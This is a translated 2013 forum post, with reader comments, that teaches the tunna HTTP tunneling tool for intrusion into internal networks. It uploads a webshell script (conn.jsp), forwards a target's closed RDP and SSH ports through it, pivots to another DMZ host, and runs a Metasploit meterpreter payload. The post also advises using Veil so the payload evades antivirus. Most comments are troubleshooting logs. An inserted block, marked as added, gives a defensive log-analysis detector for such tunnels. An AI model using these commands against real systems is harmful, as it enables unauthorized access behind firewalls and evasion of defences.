Examples of using the tunna tool


How it works: it is simply an HTTP tunneling tool

 +-------------------------------------------+                     +-------------------------------------------+
 | Local Host                                |                     | Remote Host                               |
 |-------------------------------------------|                     |-------------------------------------------|
 |   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
 |   |Client App|+----->|Local Proxy |<==========|  Firewall   |======>|  Webshell  |+------>|Server App|      |
 |   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
 +-------------------------------------------+                     +-------------------------------------------+

As the diagram shows, the tool first uses proxy.py to listen on a local port and then connects to the webshell deployed on the remote web server. The remote webshell forwards the port-forwarding requests to its own host or to another host on the remote internal network, which is what implements the HTTP tunnel. For internal network intrusion this is a very useful tool.
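Added defensive illustration, not code from the tunna project or from the original post: because the local proxy drives the webshell by repeatedly posting to one server-side script (conn.php reads the request body via php://input, as a comment further down shows), the tunnel appears in the web server's access log as a dense burst of POSTs from one client to one path. The script below runs that heuristic over constructed access-log lines; the log format, IPs, paths, the 10-second window and the threshold of 20 requests are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common/combined access-log line as written by Apache httpd, Tomcat's AccessLogValve, nginx.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Return (client_ip, timestamp, method, path_without_query, status), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, _size = m.groups()
    return ip, datetime.strptime(ts, TS_FMT), method, path.split("?")[0], int(status)

def find_tunnel_candidates(lines, window_s=10, threshold=20):
    """Map (client_ip, path) -> peak number of POSTs seen in any window_s-second span, keeping
    only pairs that reached `threshold`. A tunnel's local proxy polls its webshell many
    times per second; no human submits a form to one URL at that rate."""
    recent = defaultdict(deque)  # (ip, path) -> POST timestamps still inside the window
    peaks = {}
    for ip, ts, method, path, _status in filter(None, map(parse, lines)):
        if method != "POST":
            continue
        q = recent[(ip, path)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            peaks[(ip, path)] = max(peaks.get((ip, path), 0), len(q))
    return peaks

# Constructed sample log (hypothetical IPs): normal browsing, a slow login form, and one
# client polling conn.jsp four times a second for ten seconds.
_BASE = datetime(2013, 9, 26, 22, 47, tzinfo=timezone.utc)

def _line(ip, offset_s, method, path, status, size):
    t = (_BASE + timedelta(seconds=offset_s)).strftime(TS_FMT)
    return f'{ip} - - [{t}] "{method} {path} HTTP/1.1" {status} {size}'

SAMPLE_LOG = (
    [_line("10.0.0.5", 3 * i, "GET", f"/index.jsp?p={i}", 200, 4096) for i in range(5)]
    + [_line("10.0.0.9", 5 * i, "POST", "/login.jsp", 302, 0) for i in range(3)]
    + [_line("198.51.100.7", 0.25 * i, "POST", "/conn.jsp", 200, 19) for i in range(40)]
)

if __name__ == "__main__":
    for (ip, path), peak in find_tunnel_candidates(SAMPLE_LOG).items():
        print(f"possible HTTP tunnel: {ip} -> {path}, {peak} POSTs within 10 s")
```

On real logs the threshold should be tuned against the site's normal POST rate, and the same per-client, per-path burst can be checked on a reverse proxy or WAF in front of the application server.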

Does this tool feel familiar? Yes, it works on the same principle as reDuh, but tunna is more stable and faster.

Download: http://www.secforce.com/media/tools/tunna_v0.1.zip

The four examples below are enough to learn how to use the tool.

Example 1:

The website only exposes port 80; every other port is closed. After obtaining a JSP webshell via CVE-2013-225, upload conn.jsp and use it to forward traffic, so that the host's other ports can be reached.

A direct scan shows that 3389 is closed

mickey@pentest:~# nmap -sS -p3389 219.x.x.x

Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close  

Upload conn.jsp to the host through the webshell, then start the connection locally

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v

The parameters mean:

-l the local port to listen on
-r the remote port to forward to
-v verbose mode

Then run locally

rdesktop 127.0.0.1:1234

and you are connected to the target's 3389

Example 2:

For some services, such as SSH, the -s parameter must be added as well so that the connection does not drop.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s

ssh localhost -p 1234

Example 3:

Scenario: we already have a JSP shell on a host in the DMZ whose internal IP is 172.16.100.20. Enumeration shows another host in the DMZ (172.16.100.20) with 3389 open, and we want to use the HTTP tunnel to connect to 3389 on 172.16.100.20. The command is:

python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

There is one extra parameter here, -a, which is the IP to forward to

Example 4:

For those who like metasploit, the tool supports it too; if the target runs antivirus, though, it is advisable to use veil first to make meterpreter evade detection.

First copy tunna_exploit.rb into msf's modules/exploits/windows/misc directory.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

Then start exploiting

msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- note: this is the local machine's public IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j

Besides jsp, tunna also supports the following environments and scripts

conn.jsp   Tested on Apache Tomcat (windows + linux)
conn.aspx  Tested on IIS 6+8 (windows server 2003/2012)
conn.php   Tested on LAMP + XAMPP + IIS (windows + linux)

Note when using it: the scripts in the metasploit directory are only for use with metasploit.

Comments

wefgod 2013-09-29 09:56:57

Nice

Hxai11 2013-09-29 10:51:10

Mark

Spy4man 2013-09-29 11:15:44

Brother mickey is a pentest master of the new generation!

海盗湾V 2013-09-29 14:42:10

Learned something!

爱上平顶山 2013-09-29 19:54:02

Damn, this one is a must

爱上平顶山 2013-09-29 20:14:37

OP, please help:
Remote service to connect to at remotehost:22
Traceback (most recent call last):
File "proxy.py", line 252, in
main()
File "proxy.py", line 243, in main
setup_tunnel()
File "proxy.py", line 120, in setup_tunnel
print opener.open(url).read()
File "E:\Python27\lib\urllib2.py", line 400, in open
response = meth(req, response)
File "E:\Python27\lib\urllib2.py", line 513, in http_response
'http', request, response, code, msg, hdrs)
File "E:\Python27\lib\urllib2.py", line 438, in error
return self._call_chain(*args)
File "E:\Python27\lib\urllib2.py", line 372, in _call_chain
result = func(*args)
File "E:\Python27\lib\urllib2.py", line 521, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 404: Not Found

c2y2 2013-09-30 08:54:45

Looks awesome, learning from it, mark

ccSec 2013-10-01 17:31:50

HTTP Error 404: Not Found

X,D 2013-10-11 11:46:09

Looks awesome

一个菜鸟 2013-10-15 07:49:58

The tool throws errors when used; could one of the experts help with this?

net2 2013-12-05 11:42:05

Warning: file_get_contents(compress.zlib://php://input) [function.file-get-contents]: failed to open stream: Inappropriate ioctl for device in /var/www/conn.php on line 138
The main problem is here.

net2 2013-12-05 12:54:02

Removing compress.zlib:// fixes it.

CnCxzSec(衰仔) 2014-01-23 15:32:11

New generation... Mickey was probably already well known in the Chinese scene before you even started hacking...

m0utain 2014-07-21 11:43:30

What is going on with those errors being reported?

风萧萧 2014-07-30 15:22:55

COOL

www 2014-08-09 17:19:59

C:\Users\W\Desktop731TMP\tunna_0.1\release>proxy.py -u http://xxx.xxx.xxx.xxx/conn.aspx -l 80 -r 3389 -s -v
[+] Local Proxy listening at localhost:80
Remote service to connect to at remotehost:3389
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
('[+] Connected from', ('127.0.0.1', 51454))
[+] Starting Ping thread
Received Data: 0 (0)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (19)
Pings sent: 0
Received Data: 19 (19)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (0)
Pings sent: 0
[-] Disconnected
Received Data: 19 (0)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (0)
Pings sent: 1
[Server] Killing the handler thread
I ran into this when testing on my own machine; have you seen this before?

未了 2014-08-10 01:27:48

Why is it so unstable? It drops right after connecting, completely unusable

Tixe 2014-08-19 16:12:49

Thanks for the effort, OP, +1.
jsp to ssh is quite stable.
But connecting through aspx gives the same as above, 404: not found.
Connecting through php on wamp, the connection drops. Fatal error: Call to undefined function socket_create() in E:<absolute path>

wefgod 2014-08-21 15:55:58

Tried it today, can't connect at all... drops immediately

小健客 2014-09-12 22:39:53

Hmm, tried it, mine also drops immediately

gniq 2014-10-28 22:34:30

The php 3389 forwarding never connects for some reason (I suspect the integrated environment is to blame); ssh does work though.

Kevini 2014-12-09 13:29:51

[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
[+] Connected from ('127.0.0.1', 57495)
[+] Starting Ping thread
Received Data: 0 (0)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (19)
Pings sent: 0
Received Data: 0 (0)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (0)
Pings sent: 1
Received Data: 0 (0)
Received Data From Ping Thread: 19 (19)
Sent data: 19 (0)
Pings sent: 1
[-] Disconnected
[Server] Killing the handler thread
\Users\Kevini>python D:\release\proxy.py -u http://jczx.
aspx -l 1234 -r 3389 -v -s

DoubleHappy 2015-02-16 22:37:16

Mark

0hey_boy0 2015-04-15 15:34:15

Learned something new!!

hell0w0rld 2015-11-18 09:55:13

Indeed can't connect... neither 22 nor 3389 works

路人甲 2016-01-10 16:00:08

[+] Local Proxy listening at localhost:8888
Remote service to connect to at remotehost:22
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[OK]
[-] Keep-alive thread exited
[Server] Closing the connection
It drops immediately after connecting; what is going on?

马崧耀 2016-01-12 02:06:20

Connecting to rdp, mssql and mysql all disconnect. How do I fix this?

路人甲 2016-03-27 13:57:57

Target environment: win2003+tomcat
Problem: it errors as soon as it connects
[+] Local Proxy listening at localhost:1234
Remote service to connect to at remotehost:3389
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
[+] Connected from ('127.0.0.1', 24595)
[+] Starting Ping thread
[-] Disconnected
[Server] Closing the connection

路人甲 2016-05-18 21:27:47

@爱上平顶山 I ran into the same thing; did you solve it? Please share

Viigoss 2016-06-15 13:09:07

@爱上平顶山 how did you solve your problem???

mickey
